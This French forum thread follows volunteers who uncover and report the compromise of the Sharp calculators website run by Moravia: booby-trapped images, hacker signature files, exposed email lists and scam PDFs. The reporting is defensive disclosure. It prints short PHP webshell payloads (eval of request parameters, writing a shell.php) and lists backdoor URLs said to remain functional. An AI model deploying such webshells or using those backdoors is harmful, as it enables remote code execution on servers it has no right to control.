Le site Sharp par Moravia piraté avec du contenu adulte

[critor]

Quand tu demandes un fichier php à un serveur web, celui-ci est censé te donner le résultat du fichier php et pas le code source.

Comment c'est possible de récupérer un fichier php ainsi?

Bonjour.

Ben justement, le fichier n'a pas d'extension .php. Donc son contenu est affiché au lieu d'être exécuté.

Tout-le-monde n'a pas la chance d'avoir été formé par tes soins.

[critor]

Quoique, même avec des fichiers .php ça affiche du code source de temps en temps.

Voici par exemple :
http://www.sharp-calculators.com/module ... config.php

Code: Select all

CKEDITOR.editorConfig = function( config ) { // Define changes to default configuration here. For example: // config.language = 'fr'; // config.uiColor = '#AADC6E'; //TOOLBAR config.toolbar='CKEditor'; config.entities=false; config.toolbar_CKEditor=[ ['Source'], ['NewPage' ,'Preview' ,'Templates'], ['Cut' ,'Copy' ,'Paste' ,'PasteText' ,'PasteFromWord' ,'Print'], ['Undo' ,'Redo' ,'Find' ,'Replace' ,'SelectAll' ,'RemoveFormat'], '/', ['Bold' ,'Italic' ,'Underline' ,'Strike' ,'Subscript' ,'Superscript'], ['NumberedList' ,'BulletedList' ,'Outdent' ,'Indent'], ['JustifyLeft' ,'JustifyCenter' ,'JustifyRight' ,'JustifyBlock'], ['Link' ,'Unlink' ,'Anchor'], '/', ['Image' ,'Table' ,'HorizontalRule' ,'SpecialChar' ,'PageBreak'], ['Styles' ,'Format' ,'Font' ,'FontSize'], ['TextColor' ,'BGColor'], ['Maximize' ,'ShowBlocks' ,'About'] ]; config.skin='kama'; config.filebrowserBrowseUrl='http://www.sharp-calculators.com/modules/ckeditor/ckfinder/ckfinder.html', config.filebrowserImageBrowseUrl='http://www.sharp-calculators.com/modules/ckeditor/ckfinder/ckfinder.html?type=Images'; config.filebrowserUploadUrl='http://www.sharp-calculators.com/modules/ckeditor/ckfinder/core/connector/php/connector.php?command=QuickUpload&type=Files'; config.filebrowserImageUploadUrl='http://www.sharp-calculators.com/modules/ckeditor/ckfinder/core/connector/php/connector.php?command=QuickUpload&type=Images'; };

Apparemment une interface d'upload de fichiers, peut-être pas officielle.

[critor]

Et voici en version bien évidemment déplombée, l'image qui a été piégée :


2 exemplaires de cette image comprennent en fin de fichier du code PHP permettant d'exécuter une requête PHP passée en paramètre de l'adresse :
http://www.sharp-calculators.com/files/ckfinder/images/2(1).jpg
http://www.sharp-calculators.com/files/ ... php%3b.jpg
<?php eval($_REQUEST[a])?>

1 autre exemplaire a du code PHP légèrement différent et cette fois-ci au milieu de l'image :
http://www.sharp-calculators.com/files/ ... ages/3.jpg
<?php fputs(fopen('shell.php','w'),"<?php @eval(\$_REQUEST['cmd'])?>");?>

Heureusement que nous sommes là pour faire le travail bénévolement à la place de Moravia ; faudra que Moravia/Sharp nous donne 1 calculatrice.

[critor]

Ah ben voilà pourquoi Moravia ne répond jamais ; je n'avais pas reçu l'erreur la fois précédente :

Delivery has failed to these recipients or groups:

info@sharp-calculators.com (info@sharp-calculators.com)
Your message wasn't delivered. Despite repeated attempts to deliver your message, the recipient's email system refused to accept a connection from your email system.

Contact the recipient by some other means (by phone, for example) and ask them to tell their email admin that it appears that their email system is refusing connections from your email server. Give them the error details shown below. It's likely that the recipient's email admin is the only one who can fix this problem.

For Email Admins
No connection could be made because the target computer actively refused it. This usually results from trying to connect to a service that is inactive on the remote host - that is, one with no server application running. For more information and tips to fix this issue see this article: https://go.microsoft.com/fwlink/?LinkId=389361

Et il n'y avait aucune pièce jointe ou image dans mon courriel, juste un lien vers leur propre site.

Donc il y a possiblement plein d'enseignants qui ont déjà signalé le problème depuis 18 mois, mais comme Morovia n'est pas non plus capable d'avoir un serveur courriel qui répond à l'adresse indiquée sur leur propre site, c'est comme parler à un mur.

Je serais curieux de savoir combien Sharp et HP payent pour un tel service...

Après Sharp a aussi sa part de responsabilité, notamment la quasi impossibilité de les joindre via leur site global. Tout semble être fait pour décourager les contacts de non-acheteurs/clients :
https://www.sharp.fr/cps/rde/xchg/fr/hs ... tacter.htm
Personnellement je ne perdrai pas davantage de temps là-dessus, j'ai fait mon possible, ils n'ont qu'à se donner la peine de venir nous lire maintenant.

[critor]

Bon, j'avais donc reçu une erreur courriel de la part de info@sharp-calculators.com, mais j'avais également en copie carbone info@moravia-consulting.com et info@moravia-europe.de.

Visiblement ça a bien dû être reçu et lu quelque part.

La page enseignants avec l'image incorrecte a été nettoyée :
http://www.sharp-calculators.com/en/id/ ... -materials

Le dossier http://www.sharp-calculators.com/files/ckfinder/files/ a été vidé.
Enfin presque, ils ont oublié 1 signature de pirate :
http://www.sharp-calculators.com/files/ ... s/star.txt

|Hacked by ./St4rXr4tS | Garooda Security Squad | Thanks to Mr.RequestTimeOut |

Ou alors c'est que le site a déjà été repiraté, vu que si ils ont juste remis les fichiers d'origine sans corriger la ou les failles, ça ne sert strictement à rien.

Par contre, pas sûr qu'ils aient tout compris.
La backdoor permettant d'exécuter à distance du code PHP arbitraire est toujours présente ici :
http://www.sharp-calculators.com/files/ ... ges/1.asp/
Ainsi que les images piégées à cette même fin :
http://www.sharp-calculators.com/files/ckfinder/images/2(1).jpg
http://www.sharp-calculators.com/files/ ... php%3b.jpg
http://www.sharp-calculators.com/files/ ... ages/3.jpg

Pas reçu le moindre remerciement pour le temps passé là-dessus, ni ne serait-ce qu'un simple courriel avec 1 ligne de politesse. Je note, et si cette incorrection doit se confirmer j'en tirerai toutes les conséquences.

Pour info le courriel envoyé, il me semble qu'il était de son côté suffisamment correct, bienveillant et désintéressé pour mériter au moins une réponse de politesse :

Dear Madam or Sir from Moravia,
Sehr geehrte Dame oder sehr geehrter Herr von Moravia,


If the information is up to date, you are in charge of the following web site :
http://www.sharp-calculators.com/

It looks like your site was hacked over 18 months ago.

An inappropriate picture is shown at the bottom of the teachers page :
http://www.sharp-calculators.com/en/id/ ... -materials

You've got over 30 different hacker signature injections :
http://www.sharp-calculators.com/files/ ... s/4y1n.txt
http://www.sharp-calculators.com/files/ ... Crootz.txt
http://www.sharp-calculators.com/files/ ... les/DA.txt
http://www.sharp-calculators.com/files/ ... es/ayt.txt
http://www.sharp-calculators.com/files/ ... es/bdc.txt
http://www.sharp-calculators.com/files/ ... es/bms.txt
http://www.sharp-calculators.com/files/ ... es/bot.txt
http://www.sharp-calculators.com/files/ ... es/drk.txt
http://www.sharp-calculators.com/files/ ... ckd%3b.txt
http://www.sharp-calculators.com/files/ ... les/ik.txt
http://www.sharp-calculators.com/files/ ... /index.txt
http://www.sharp-calculators.com/files/ ... s/nerd.txt
http://www.sharp-calculators.com/files/ ... ctgans.txt
http://www.sharp-calculators.com/files/ ... /robot.txt
http://www.sharp-calculators.com/files/ ... es/ruu.txt
http://www.sharp-calculators.com/files/ ... les/sg.txt
http://www.sharp-calculators.com/files/ ... s/star.txt
http://www.sharp-calculators.com/files/ ... les/su.txt
http://www.sharp-calculators.com/files/ ... iles/w.txt
http://www.sharp-calculators.com/files/ ... es/why.txt
http://www.sharp-calculators.com/files/ ... les/ws.txt
http://www.sharp-calculators.com/files/ ... es/yii.txt
http://www.sharp-calculators.com/files/ ... iles/z.txt
http://www.sharp-calculators.com/files/ ... es/zZz.txt
http://www.sharp-calculators.com/files/ ... /zuaha.txt
http://www.sharp-calculators.com/files/ ... xx/ayt.txt
http://www.sharp-calculators.com/files/ ... hacked.jpg
http://www.sharp-calculators.com/files/ ... ges/WS.jpg
http://www.sharp-calculators.com/files/ ... ges/12.png
http://www.sharp-calculators.com/files/ ... %20y4n.png

You are publicly serving several email address lists...
http://www.sharp-calculators.com/files/ ... mail_1.txt
http://www.sharp-calculators.com/files/ ... mail_2.txt
http://www.sharp-calculators.com/files/ ... mail_3.txt

... and a strange URL list :
http://www.sharp-calculators.com/files/ ... iles/p.txt

It looks like several backdoors were installed on your web site, enabling hackers to upload files and run arbitrary code directly on your server whenever they want to :
http://www.sharp-calculators.com/files/ ... ges/1.asp/
http://www.sharp-calculators.com/files/ ... images/2(1).jpg
http://www.sharp-calculators.com/files/ ... php%3b.jpg

You are also serving thousands of scamming PDF files :
http://www.sharp-calculators.com/files/ckfinder/files/
More and more of these files still go on being uploaded daily, either manually either automatically.

And I probably haven't found everything.
If you are still in charge of sharp-calculators.com, I'd advise you to fully wipe out this web server content and restart from a fresh and clean copy of the original files.



Yours faithfully
Xavier Andréani

[Adriweb]

Peut être que leur domaine est tellement blacklisté maintenant que n'importe quel mail envoyé n'arrive jamais/nul part ?

[critor]

C'est confirmé, Moravia a une fois de plus fait du mauvais travail, les backdoors sont bel et bien toujours fonctionnelles. Un pirate vient en effet tout juste de rajouter sa signature en double :
http://www.sharp-calculators.com/files/ ... s/4040.txt
http://www.sharp-calculators.com/files/ckfinder/files/4040(1).txt

touched by SCR4VEN404

Mais tant qu'ils n'auront pas fait preuve d'au moins le minimum de correction en me répondant, je ne leur signalerai ni expliquerai plus rien.

[SlyVTT]

C'est confirmé, Moravia a une fois de plus fait du mauvais travail, les backdoors sont bel et bien toujours fonctionnelles. Un pirate vient en effet tout juste de rajouter sa signature en double :
http://www.sharp-calculators.com/files/ ... s/4040.txt
http://www.sharp-calculators.com/files/ckfinder/files/4040(1).txt

touched by SCR4VEN404

C'est affligeant !!
Même en y connaissant rien, juste en surveillant l'apparition de tels fichiers de signatures dans l'arborescence du serveur, on doit se rendre compte que qq chose ne va pas...
Franchement ils ont de la chance que ça reste des intrusions gentilles, car là on est dans "l'ultra soft".
Vu la passoire qu'est leur site, on ne peut pas raisonnablement orienter un acheteur, si la zone achat est aussi peu sécurisée, qui sait ce que peuvent devenir les données perso des potentiels clients.

Tu as 1000 fois raison Critor, c'est du travail de cochon qu'ils ont fait...

Ciao

Sly

[critor]

C'est confirmé, Moravia a une fois de plus fait du mauvais travail, les backdoors sont bel et bien toujours fonctionnelles. Un pirate vient en effet tout juste de rajouter sa signature en double :
http://www.sharp-calculators.com/files/ ... s/4040.txt
http://www.sharp-calculators.com/files/ckfinder/files/4040(1).txt

touched by SCR4VEN404

Fichiers supprimés.

Le dossier http://www.sharp-calculators.com/files/ckfinder/files/ a été vidé.
Enfin presque, ils ont oublié 1 signature de pirate :
http://www.sharp-calculators.com/files/ ... s/star.txt

|Hacked by ./St4rXr4tS | Garooda Security Squad | Thanks to Mr.RequestTimeOut |

Ainsi que celui-ci, donc je suppose que Moravia doit nous lire et bien profiter de notre travail, tout en restant de grossiers personnages toujours totalement incapables de passer 10 secondes à produire ne serait-ce qu'une simple réponse de politesse monoligne.

Les adresses des backdoors partagées plus haut restent apparemment valides.

[critor]

Et voilà, sais pas ce qu'ils ont fait chez Moravia depuis une semaine (on aurait pu imaginer qu'ils travaillaient dur à tout sécuriser/réparer et n'avaient donc pas le temps de fournir une simple réponse de politesse), mais visiblement non la publication de scams vient tout juste de reprendre dans le dossier sharp-calculators.com/files/ckfinder/files :

Code: Select all

minecraft-free-trial_GM479516143.pdf
minecraft-hacked-apk_GM479516143.pdf

Une entreprise qui cumule l'irrespect, l'incorrection, l'impolitesse, l'incurie et l'incompétence c'est le bouquet ; HP et Sharp auraient difficilement pu trouver pire sous-traitant.